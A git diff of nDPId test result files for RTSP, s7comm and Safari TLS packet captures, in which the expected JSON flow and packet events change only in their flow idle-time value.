00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625568705778} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1625568705778,"pkt":"AAwpI6CIeCSvPj0DCABFAADbwOlAAEAGFzesHAWqrBwEGvlgIWqjD4UUiv5WgFAYA\/\/+rgAAU0VUVVAgcnRzcDovLzE3Mi4yOC40LjI2Ojg1NTQvdHJhY2tJRD04OCBSVFNQLzEuMA0KQ1NlcTogNA0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpUcmFuc3BvcnQ6IFJUUC9BVlA7dW5pY2FzdDtjbGllbnRfcG9ydD01MDIyMC01MDIyMQ0KDQo="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
-00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625568705778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1625568705778,"pkt":"AAwpI6CIeCSvPj0DCABFAADbwOlAAEAGFzesHAWqrBwEGvlgIWqjD4UUiv5WgFAYA\/\/+rgAAU0VUVVAgcnRzcDovLzE3Mi4yOC40LjI2Ojg1NTQvdHJhY2tJRD04OCBSVFNQLzEuMA0KQ1NlcTogNA0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpUcmFuc3BvcnQ6IFJUUC9BVlA7dW5pY2FzdDtjbGllbnRfcG9ydD01MDIyMC01MDIyMQ0KDQo="} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1625568705778} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 diff --git a/test/results/s7comm.pcap.out b/test/results/s7comm.pcap.out index a2b1fd98c..e27e7d0ff 100644 --- a/test/results/s7comm.pcap.out +++ b/test/results/s7comm.pcap.out 
@@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"s7comm.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1408528803880} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803880,"pkt":"ABsbI+s7kOa6hF5BCABFAAA+LUtAAIAGAADAqAEKwKgBKBBZAGaQRN2iAAL7EFAY+vCDswAAAwAAFhHgAAAABwDBAgEAwgIBAsABCg=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1408528803884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803884,"pkt":"kOa6hF5BABsbI+s7CABFAAA+AM4AAB4GGGrAqAEowKgBCgBmEFkAAvsQkETduFAYEAAGowAAAwAAFhHQAAcAAwDAAQrBAgEAwgIBAg=="} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1408528803884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1408528803884,"pkt":"ABsbI+s7kOa6hF5BCABFAABBLUxAAIAGAADAqAEKwKgBKBBZAGaQRN24AAL7JlAY+tqDtgAAAwAAGQLwgDIBAAACAAAIAADwAAABAAEB4A=="} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7440000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1408528803880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803880,"pkt":"ABsbI+s7kOa6hF5BCABFAAA+LUtAAIAGAADAqAEKwKgBKBBZAGaQRN2iAAL7EFAY+vCDswAAAwAAFhHgAAAABwDBAgEAwgIBAsABCg=="} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7560000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1408528803884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803884,"pkt":"kOa6hF5BABsbI+s7CABFAAA+AM4AAB4GGGrAqAEowKgBCgBmEFkAAvsQkETduFAYEAAGowAAAwAAFhHQAAcAAwDAAQrBAgEAwgIBAg=="} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1408528803884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1408528803884,"pkt":"ABsbI+s7kOa6hF5BCABFAABBLUxAAIAGAADAqAEKwKgBKBBZAGaQRN24AAL7JlAY+tqDtgAAAwAAGQLwgDIBAAACAAAIAADwAAABAAEB4A=="} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7560000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","packets-captured":55,"packets-processed":55,"total-skipped-flows":0,"total-l4-data-len":2290,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1408528804016} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 55/55 diff --git a/test/results/safari.pcap.out b/test/results/safari.pcap.out index 2d455a393..8115dcf76 100644 --- a/test/results/safari.pcap.out +++ b/test/results/safari.pcap.out 
@@ -1,56 +1,56 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"safari.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620898024056} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898024056,"flow_last_seen":1620898024056,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898024056,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620898024056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898024056,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfeAbt7aT+8AAAAALAC\/\/8bGAAAAgQFtAEDAwUBAQgKMzDFWAAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620898024084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898024084,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7194MY\/Pce2k\/vaAS\/ohIgwAAAgQFrAQCCAo6VqpvMzDFWAEDAwc="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620898024085,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898024085,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfeAbt7aT+9DGPz3YAQECxliAAAAQEICjMwxXQ6Vqpv"} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfhAbvK+gqhAAAAALAC\/\/\/8IwAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfiAbtAr8myAAAAALAC\/\/\/HXAAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfjAbsjVMkKAAAAALAC\/\/\/lXgAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025217,"flow_last_seen":1620898025217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025217,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620898025217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025217,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfkAbuNFQaeAAAAALAC\/\/8+CAAAAgQFtAEDAwUBAQgKMzDJ1AAAAAAEAgAA"} 
